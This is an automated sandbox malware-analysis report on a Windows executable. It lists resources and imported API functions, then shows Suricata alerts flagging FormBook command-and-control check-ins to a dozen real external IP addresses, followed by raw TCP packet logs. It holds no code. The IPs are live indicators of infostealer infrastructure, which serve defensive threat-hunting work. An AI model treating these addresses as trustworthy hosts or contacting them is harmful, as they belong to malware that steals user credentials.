                                                    RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                    RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                    RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                    RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                    RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                    RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                    RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                    RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                    RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                    RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                    RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                    RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                    RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                    RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                    RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                    RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                    RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                    RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                    RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                    RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                    RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                    Imports

                                                    DLLImport
                                                    WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                    VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                    COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                    MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                    PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                    USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                    KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                    USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                    GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                    ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                    ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                    OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishGreat Britain
                                                    EnglishUnited States

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-09-26T09:23:04.559019+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44978185.159.66.9380TCP
                                                    2024-09-26T09:23:04.559019+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44978185.159.66.9380TCP
                                                    2024-09-26T09:23:55.434101+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449736148.72.152.17480TCP
                                                    2024-09-26T09:23:55.434101+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449736148.72.152.17480TCP
                                                    2024-09-26T09:24:10.970988+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497383.33.130.19080TCP
                                                    2024-09-26T09:24:13.521153+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497393.33.130.19080TCP
                                                    2024-09-26T09:24:16.052736+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497403.33.130.19080TCP
                                                    2024-09-26T09:24:21.563900+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4497413.33.130.19080TCP
                                                    2024-09-26T09:24:21.563900+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497413.33.130.19080TCP
                                                    2024-09-26T09:24:27.786721+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449742172.191.244.6280TCP
                                                    2024-09-26T09:24:30.335442+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449743172.191.244.6280TCP
                                                    2024-09-26T09:24:32.880497+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449744172.191.244.6280TCP
                                                    2024-09-26T09:24:35.420856+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449745172.191.244.6280TCP
                                                    2024-09-26T09:24:35.420856+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449745172.191.244.6280TCP
                                                    2024-09-26T09:24:41.763173+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449746172.96.191.3980TCP
                                                    2024-09-26T09:24:44.289289+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449747172.96.191.3980TCP
                                                    2024-09-26T09:24:46.853309+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449748172.96.191.3980TCP
                                                    2024-09-26T09:24:49.378438+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449749172.96.191.3980TCP
                                                    2024-09-26T09:24:49.378438+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449749172.96.191.3980TCP
                                                    2024-09-26T09:25:00.076321+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449750217.70.184.5080TCP
                                                    2024-09-26T09:25:02.640352+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449751217.70.184.5080TCP
                                                    2024-09-26T09:25:05.171228+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449752217.70.184.5080TCP
                                                    2024-09-26T09:25:07.759988+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449753217.70.184.5080TCP
                                                    2024-09-26T09:25:07.759988+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449753217.70.184.5080TCP
                                                    2024-09-26T09:25:13.976010+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975463.250.47.4080TCP
                                                    2024-09-26T09:25:16.518559+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975563.250.47.4080TCP
                                                    2024-09-26T09:25:19.075531+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975663.250.47.4080TCP
                                                    2024-09-26T09:25:21.626143+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44975763.250.47.4080TCP
                                                    2024-09-26T09:25:21.626143+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44975763.250.47.4080TCP
                                                    2024-09-26T09:25:28.201219+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975891.184.0.20080TCP
                                                    2024-09-26T09:25:29.847472+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975991.184.0.20080TCP
                                                    2024-09-26T09:25:32.503709+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976091.184.0.20080TCP
                                                    2024-09-26T09:25:34.954937+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44976191.184.0.20080TCP
                                                    2024-09-26T09:25:34.954937+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44976191.184.0.20080TCP
                                                    2024-09-26T09:25:40.470004+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976213.248.169.4880TCP
                                                    2024-09-26T09:25:43.017322+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976313.248.169.4880TCP
                                                    2024-09-26T09:25:45.577550+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976413.248.169.4880TCP
                                                    2024-09-26T09:25:48.123872+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44976513.248.169.4880TCP
                                                    2024-09-26T09:25:48.123872+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44976513.248.169.4880TCP
                                                    2024-09-26T09:26:08.214268+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977043.242.202.16980TCP
                                                    2024-09-26T09:26:10.737327+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977143.242.202.16980TCP
                                                    2024-09-26T09:26:13.288202+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977243.242.202.16980TCP
                                                    2024-09-26T09:26:16.665501+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44977343.242.202.16980TCP
                                                    2024-09-26T09:26:16.665501+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44977343.242.202.16980TCP
                                                    2024-09-26T09:26:23.209876+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449774103.224.182.24280TCP
                                                    2024-09-26T09:26:25.747416+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449775103.224.182.24280TCP
                                                    2024-09-26T09:26:28.315372+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449776103.224.182.24280TCP
                                                    2024-09-26T09:26:30.855122+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449777103.224.182.24280TCP
                                                    2024-09-26T09:26:30.855122+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449777103.224.182.24280TCP
                                                    2024-09-26T09:26:37.512382+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977885.159.66.9380TCP
                                                    2024-09-26T09:26:40.061281+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977985.159.66.9380TCP
                                                    2024-09-26T09:26:42.606058+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978085.159.66.9380TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 26, 2024 09:23:54.825200081 CEST4973680192.168.2.4148.72.152.174
                                                    Sep 26, 2024 09:23:54.830234051 CEST8049736148.72.152.174192.168.2.4
                                                    Sep 26, 2024 09:23:54.830400944 CEST4973680192.168.2.4148.72.152.174
                                                    Sep 26, 2024 09:23:54.838567019 CEST4973680192.168.2.4148.72.152.174
                                                    Sep 26, 2024 09:23:54.843400955 CEST8049736148.72.152.174192.168.2.4
                                                    Sep 26, 2024 09:23:55.433655977 CEST8049736148.72.152.174192.168.2.4
                                                    Sep 26, 2024 09:23:55.433689117 CEST8049736148.72.152.174192.168.2.4
                                                    Sep 26, 2024 09:23:55.434101105 CEST4973680192.168.2.4148.72.152.174
                                                    Sep 26, 2024 09:23:55.437453032 CEST4973680192.168.2.4148.72.152.174
                                                    Sep 26, 2024 09:23:55.442313910 CEST8049736148.72.152.174192.168.2.4
                                                    Sep 26, 2024 09:24:10.506638050 CEST4973880192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:10.511683941 CEST80497383.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:10.511764050 CEST4973880192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:10.522964954 CEST4973880192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:10.527749062 CEST80497383.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:10.970864058 CEST80497383.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:10.970988035 CEST4973880192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:12.027821064 CEST4973880192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:12.032870054 CEST80497383.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:13.048144102 CEST4973980192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:13.053183079 CEST80497393.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:13.053710938 CEST4973980192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:13.071923018 CEST4973980192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:13.077657938 CEST80497393.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:13.520700932 CEST80497393.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:13.521152973 CEST4973980192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:14.574625015 CEST4973980192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:14.579535007 CEST80497393.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:15.593599081 CEST4974080192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:15.598738909 CEST80497403.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:15.599276066 CEST4974080192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:15.610882044 CEST4974080192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:15.615983009 CEST80497403.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:15.616017103 CEST80497403.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:15.616044044 CEST80497403.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:15.616070032 CEST80497403.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:15.616118908 CEST80497403.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:15.616147041 CEST80497403.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:15.616174936 CEST80497403.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:15.616200924 CEST80497403.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:15.616226912 CEST80497403.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:16.052608967 CEST80497403.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:16.052736044 CEST4974080192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:17.121515989 CEST4974080192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:17.126636982 CEST80497403.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:18.140793085 CEST4974180192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:18.145926952 CEST80497413.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:18.146037102 CEST4974180192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:18.153629065 CEST4974180192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:18.158580065 CEST80497413.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:21.563687086 CEST80497413.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:21.563710928 CEST80497413.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:21.563899994 CEST4974180192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:21.566941023 CEST4974180192.168.2.43.33.130.190
                                                    Sep 26, 2024 09:24:21.571710110 CEST80497413.33.130.190192.168.2.4
                                                    Sep 26, 2024 09:24:27.303544998 CEST4974280192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:27.308495998 CEST8049742172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:27.308621883 CEST4974280192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:27.320738077 CEST4974280192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:27.325742960 CEST8049742172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:27.786573887 CEST8049742172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:27.786603928 CEST8049742172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:27.786720991 CEST4974280192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:28.824723005 CEST4974280192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:29.843722105 CEST4974380192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:29.848720074 CEST8049743172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:29.848818064 CEST4974380192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:29.860094070 CEST4974380192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:29.865195990 CEST8049743172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:30.335239887 CEST8049743172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:30.335393906 CEST8049743172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:30.335442066 CEST4974380192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:31.371540070 CEST4974380192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:32.390783072 CEST4974480192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:32.395584106 CEST8049744172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:32.395699978 CEST4974480192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:32.408077002 CEST4974480192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:32.413039923 CEST8049744172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:32.413053989 CEST8049744172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:32.413062096 CEST8049744172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:32.413072109 CEST8049744172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:32.413079977 CEST8049744172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:32.413090944 CEST8049744172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:32.413100004 CEST8049744172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:32.413109064 CEST8049744172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:32.413116932 CEST8049744172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:32.880239010 CEST8049744172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:32.880496979 CEST4974480192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:33.918411970 CEST4974480192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:33.923477888 CEST8049744172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:34.937719107 CEST4974580192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:34.942781925 CEST8049745172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:34.942922115 CEST4974580192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:34.950689077 CEST4974580192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:34.955578089 CEST8049745172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:35.420710087 CEST8049745172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:35.420751095 CEST8049745172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:35.420855999 CEST4974580192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:35.424559116 CEST4974580192.168.2.4172.191.244.62
                                                    Sep 26, 2024 09:24:35.429300070 CEST8049745172.191.244.62192.168.2.4
                                                    Sep 26, 2024 09:24:40.813729048 CEST4974680192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:40.820096970 CEST8049746172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:40.820477962 CEST4974680192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:40.835298061 CEST4974680192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:40.841597080 CEST8049746172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:41.763046980 CEST8049746172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:41.763084888 CEST8049746172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:41.763173103 CEST4974680192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:42.341213942 CEST4974680192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:43.360044003 CEST4974780192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:43.365151882 CEST8049747172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:43.365423918 CEST4974780192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:43.378123045 CEST4974780192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:43.383054018 CEST8049747172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:44.287662029 CEST8049747172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:44.287683964 CEST8049747172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:44.289288998 CEST4974780192.168.2.4172.96.191.39
